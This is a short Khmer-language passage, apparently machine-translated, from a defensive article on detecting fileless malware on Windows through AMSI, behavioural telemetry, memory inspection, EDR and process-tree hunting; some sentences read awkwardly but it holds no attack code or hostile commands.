ដំណោះស្រាយសហគ្រាសរបស់ Microsoft រួមបញ្ចូលគ្នានូវ AMSI, ការវិភាគអាកប្បកិរិយា, ពិនិត្យការចងចាំ និងការការពារផ្នែកចាប់ផ្ដើម បូករួមទាំងគំរូ ML ដែលមានមូលដ្ឋានលើពពក ដើម្បីធ្វើមាត្រដ្ឋានប្រឆាំងនឹងការគំរាមកំហែងដែលកំពុងកើតឡើង។ អ្នកលក់ផ្សេងទៀតអនុវត្តការត្រួតពិនិត្យកម្រិតខឺណែល ដើម្បីកំណត់ភាពខុសគ្នាពីកម្មវិធីព្យាបាទ ជាមួយនឹងការផ្លាស់ប្តូរដោយស្វ័យប្រវត្តិ។

វិធីសាស្រ្តផ្អែកលើ រឿងរ៉ាវនៃការប្រតិបត្តិ វាអនុញ្ញាតឱ្យអ្នកកំណត់អត្តសញ្ញាណមូលហេតុឫសគល់ (ឧទាហរណ៍ ឯកសារភ្ជាប់ Outlook ដែលបង្កឱ្យមានខ្សែសង្វាក់) និងកាត់បន្ថយមែកធាងទាំងមូល៖ ស្គ្រីប កូនសោ ភារកិច្ច និងប្រព័ន្ធគោលពីរកម្រិតមធ្យម ជៀសវាងការជាប់គាំងនៅលើរោគសញ្ញាដែលអាចមើលឃើញ។

កំហុសទូទៅ និងរបៀបជៀសវាងពួកគេ។

ការទប់ស្កាត់ PowerShell ដោយគ្មានផែនការគ្រប់គ្រងជំនួសគឺមិនត្រឹមតែមិនអាចអនុវត្តបានប៉ុណ្ណោះទេ ប៉ុន្តែក៏មានផងដែរ។ វិធីដើម្បីហៅវាដោយប្រយោល។អនុវត្តដូចគ្នាចំពោះម៉ាក្រូ៖ ទាំងអ្នកគ្រប់គ្រងពួកវាដោយគោលការណ៍ និងហត្ថលេខា ឬអាជីវកម្មនឹងរងទុក្ខ។ វាជាការល្អប្រសើរជាងមុនដើម្បីផ្តោតលើ telemetry និងច្បាប់អាកប្បកិរិយា។

កំហុសទូទៅមួយទៀតគឺការជឿថាកម្មវិធីក្នុងបញ្ជីសអាចដោះស្រាយអ្វីៗគ្រប់យ៉ាង៖ បច្ចេកវិទ្យាគ្មានឯកសារពឹងផ្អែកយ៉ាងជាក់លាក់លើបញ្ហានេះ។ កម្មវិធីដែលទុកចិត្តការគ្រប់គ្រងគួរតែសង្កេតមើលអ្វីដែលពួកគេធ្វើ និងរបៀបដែលពួកគេទាក់ទង មិនមែនគ្រាន់តែថាតើពួកគេត្រូវបានអនុញ្ញាតនោះទេ។

ជាមួយនឹងការទាំងអស់ខាងលើ មេរោគដែលគ្មានឯកសារនឹងឈប់ជា "ខ្មោច" នៅពេលអ្នកតាមដានអ្វីដែលពិតជាសំខាន់៖ អាកប្បកិរិយា ការចងចាំ និងប្រភពដើម នៃការប្រតិបត្តិនីមួយៗ។ ការរួមបញ្ចូលគ្នារវាង AMSI, telemetry ដំណើរការសម្បូរបែប, ការគ្រប់គ្រង Windows 11 ដើម និងស្រទាប់ EDR ជាមួយនឹងការវិភាគអាកប្បកិរិយាផ្តល់ឱ្យអ្នកនូវអត្ថប្រយោជន៍។ បន្ថែមទៅលើគោលការណ៍ជាក់ស្តែងសមីការសម្រាប់ម៉ាក្រូ និង PowerShell សវនកម្ម WMI/Registry និងការបរបាញ់ដែលផ្តល់អាទិភាពដល់បន្ទាត់ពាក្យបញ្ជា និងដំណើរការដើមឈើ ហើយអ្នកមានខ្សែការពារដែលកាត់ខ្សែសង្វាក់ទាំងនេះមុនពេលពួកគេបញ្ចេញសំឡេង។